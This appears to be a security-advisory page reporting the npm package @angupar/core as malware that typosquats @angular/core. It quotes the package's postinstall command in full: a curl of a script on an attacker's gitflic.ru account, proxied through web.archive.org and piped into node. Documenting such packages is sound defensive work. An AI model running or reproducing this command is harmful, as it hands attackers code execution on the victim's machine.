Logo
npm

@angupar/core@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17539

Ecosystem

npm

Summary

Package impersonates @angular/core (name @angupar/core, author field "angular", repository pointing at github.com/angular/angular, README copied from Angular). Its package.json postinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from a third-party user account (hellscripter on gitflic.ru) through a web.archive.org proxy and piping it directly to the installer's Node runtime. The fetch is unpinned, has no integrity check, and resolves to a host unrelated to the Angular project. npm install @angupar/core therefore yields arbitrary install-time code execution under attacker control, with the typosquat on @angular/core serving as the delivery lure.

Source: amazon-inspector (61d3f74118d7ca9e50d79028ad472e56f68c8f86111fb03973a0c01a00b4cd84)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.